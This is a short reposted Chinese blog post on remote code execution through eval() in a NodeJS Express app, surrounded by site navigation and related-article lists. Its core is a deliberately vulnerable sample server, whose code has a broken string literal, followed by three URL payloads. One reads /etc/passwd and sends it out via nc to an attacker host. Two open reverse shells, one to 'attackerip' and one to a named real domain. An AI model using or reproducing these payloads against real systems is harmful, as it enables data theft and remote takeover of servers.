首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
NodeJS学习笔记之(Url,QueryString,Path)模块
Jan 13 NodeJs
Nodejs--post的公式详解
Apr 29 NodeJs
NodeJS实现微信公众号关注后自动回复功能
May 31 NodeJs
ajax +NodeJS 实现图片上传实例
Jun 06 NodeJs
nodejs利用ajax实现网页无刷新上传图片实例代码
Jun 06 NodeJs
浅析 NodeJs 的几种文件路径
Jun 07 NodeJs
nodejs之get/post请求的几种方式小结
Jul 26 NodeJs
nodejs 图解express+supervisor+ejs的用法(推荐)
Sep 08 NodeJs
nodejs实现简单的gulp打包
Dec 21 NodeJs
Nodejs模块载入运行原理
Feb 23 NodeJs
nodejs(officegen)+vue(axios)在客户端导出word文档的方法
Jul 31 NodeJs
nodejs nedb 封装库与使用方法示例
Feb 06 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
MutationObserver(1) minio(1) Outlook(1) 黑屏(2) appdata(1) SeaTable(1) OOP(1) tree shaking(1) Mysql8(2) celery(1)
You might like
php+mysql+ajax实现单表多字段多关键词查询的方法
2017/04/15 PHP
[原创]站长必须要知道的javascript广告代码
2007/05/30 Javascript
Javascript常用运算符(Operators)-javascript基础教程
2007/12/14 Javascript
JavaScript Event学习第十一章 按键的检测
2010/02/10 Javascript
一个轻量级的javascript库 pj介绍
2010/12/19 Javascript
我的javascript 函数链之演变
2011/04/07 Javascript
ExtJS4中的requires使用方法示例介绍
2013/12/03 Javascript
超级简单的jquery操作表格方法
2014/12/15 Javascript
学习JavaScript设计模式(接口)
2015/11/26 Javascript
Actionscript与javascript交互实例程序(修改)
2016/09/22 Javascript
EasyUI 结合JS导出Excel文件的实现方法
2016/11/10 Javascript
JS百度地图搜索悬浮窗功能
2017/01/12 Javascript
prototype.js简单实现ajax功能示例
2017/10/18 Javascript
Angular事件之不同组件间传递数据的方法
2018/11/15 Javascript
node基于async/await对mysql进行封装
2019/06/20 Javascript
如何基于原生javaScript生成带图片的二维码
2019/11/21 Javascript
vue自定义插件封装,实现简易的elementUi的Message和MessageBox的示例
2020/11/20 Vue.js
[03:17]2014DOTA2 国际邀请赛中国区预选赛 四强专访
2014/05/23 DOTA
Python标准异常和异常处理详解
2015/02/02 Python
python爬虫自动创建文件夹的功能
2018/08/01 Python
python多线程同步之文件读写控制
2021/02/25 Python
详解Python中的format格式化函数的使用方法
2019/11/20 Python
Python中 Global和Nonlocal的用法详解
2020/01/20 Python
Python importlib模块重载使用方法详解
2020/10/13 Python
CSS3 :default伪类选择器使用简介
2018/03/15 HTML / CSS
详解css position 5种不同的值的用法
2019/07/30 HTML / CSS
css3动画鼠标放上图片逐渐变大鼠标离开图片逐渐缩小效果
2021/01/27 HTML / CSS
VIVOBAREFOOT赤脚鞋:让您的脚做自然的事情
2017/06/01 全球购物
异步传递消息系统的作用
2016/05/01 面试题
管道维修工岗位职责
2013/12/27 职场文书
会计辞职信范文
2014/01/15 职场文书
城管大队整治方案
2014/05/06 职场文书
2014大学生中国梦主题教育学习思想汇报
2014/09/10 职场文书
在职证明书范本(2014新版)
2014/09/25 职场文书
毕业生登记表班级意见
2015/06/05 职场文书
java executor包参数处理功能 
2022/02/15 Java/Android